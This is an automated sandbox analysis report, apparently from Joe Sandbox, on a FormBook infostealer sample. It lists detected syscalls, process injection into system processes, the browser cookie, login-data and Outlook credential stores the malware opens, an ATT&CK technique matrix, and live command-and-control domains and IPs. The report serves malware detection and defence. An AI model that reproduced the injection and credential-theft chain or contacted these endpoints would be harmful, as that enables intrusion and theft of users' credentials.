            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 5460
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 298A008
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00436CD7 LogonUserW, | 0_2_00436CD7
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, | 0_2_0040D590
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00434418
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, | 0_2_0043333C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00446124
            Source: fJD7ivEnzm.exe, IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: IqZHJpXEsts.exe, 00000004.00000002.3639414937.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000000.1922688819.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067684255.0000000001350000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: fJD7ivEnzm.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, | 0_2_004720DB
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00472C3F GetUserNameW, | 0_2_00472C3F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, | 0_2_0041E364
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, | 0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: fJD7ivEnzm.exe | Binary or memory string: WIN_XP
            Source: fJD7ivEnzm.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: fJD7ivEnzm.exe | Binary or memory string: WIN_XPe
Source: fJD7ivEnzm.exe | Binary or memory string: WIN_VISTA
Source: fJD7ivEnzm.exe | Binary or memory string: WIN_7
Source: fJD7ivEnzm.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1529089 | Sample: fJD7ivEnzm.exe | Start date: 08/10/2024 | Architecture: WINDOWS | Score: 100
• Start node. DNS/IP: www.woshop.online; www.tekilla.wtf; 16 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures
• fJD7ivEnzm.exe (started). Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
• svchost.exe (started by fJD7ivEnzm.exe). Signatures: Maps a DLL or memory area into another process
• IqZHJpXEsts.exe (injected by svchost.exe). Signatures: Found direct / indirect Syscall (likely to bypass EDR)
• netbtugc.exe (started by IqZHJpXEsts.exe). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• IqZHJpXEsts.exe (injected by netbtugc.exe). DNS/IP: www.kexweb.top 63.250.47.40, ports 50021, 50022, 50023, NAMECHEAP-NETUS, United States; bola88site.one 172.96.191.39, ports 49965, 49979, 49990, LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG, Canada; 7 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
• firefox.exe (started by netbtugc.exe)

Source | Detection | Scanner | Label | Link
fJD7ivEnzm.exe | 68% | ReversingLabs | Win32.Backdoor.FormBook | -
fJD7ivEnzm.exe | 100% | Avira | HEUR/AGEN.1321685 | -
fJD7ivEnzm.exe | 100% | Joe Sandbox ML | - | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | -
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | -
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | -
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | -
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | -
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | -
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | -
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.elsupertodo.net | 148.72.152.174 | true | true | - | unknown
webredir.vip.gandi.net | 217.70.184.50 | true | true | - | unknown
www.nobartv6.website | 103.224.182.242 | true | true | - | unknown
www.kexweb.top | 63.250.47.40 | true | true | - | unknown
bola88site.one | 172.96.191.39 | true | true | - | unknown
www.dyme.tech | 13.248.169.48 | true | true | - | unknown
www.mizuquan.top | 43.242.202.169 | true | true | - | unknown
redirect.3dns.box | 172.191.244.62 | true | true | - | unknown
jobworklanka.online | 91.184.0.200 | true | true | - | unknown
omexai.info | 3.33.130.190 | true | true | - | unknown
www.tekilla.wtf | unknown | unknown | true | - | unknown
www.omexai.info | unknown | unknown | true | - | unknown
www.woshop.online | unknown | unknown | true | - | unknown
www.languagemodel.pro | unknown | unknown | true | - | unknown
www.bola88site.one | unknown | unknown | true | - | unknown
www.jobworklanka.online | unknown | unknown | true | - | unknown
www.arlon-commerce.com | unknown | unknown | true | - | unknown
www.kxshopmr.store | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.omexai.info/7xi5/ | true | - | unknown
http://www.dyme.tech/h7lb/ | true | - | unknown
http://www.kexweb.top/3bdq/ | true | - | unknown
http://www.mizuquan.top/e0nr/ | true | - | unknown
http://www.languagemodel.pro/nxfn/ | true | - | unknown
http://www.bola88site.one/3qit/ | true | - | unknown
http://www.jobworklanka.online/ikh0/ | true | - | unknown
http://www.tekilla.wtf/fpzw/ | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.mizuquan.top | IqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmp | false | - | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domain | netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmp | false | - | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=languagemodel.pro | netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmp | false | - | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.191.244.62 | redirect.3dns.box | United States | 7018 | ATT-INTERNET4US | true
63.250.47.40 | www.kexweb.top | United States | 22612 | NAMECHEAP-NETUS | true
13.248.169.48 | www.dyme.tech | United States | 16509 | AMAZON-02US | true
91.184.0.200 | jobworklanka.online | Netherlands | 197902 | HOSTNETNL | true
172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
148.72.152.174 | www.elsupertodo.net | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
3.33.130.190 | omexai.info | United States | 8987 | AMAZONEXPANSIONGB | true
43.242.202.169 | www.mizuquan.top | Hong Kong | 40065 | CNSERVERSUS | true
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1529089
                                                                        Start date and time:2024-10-08 16:32:21 +02:00
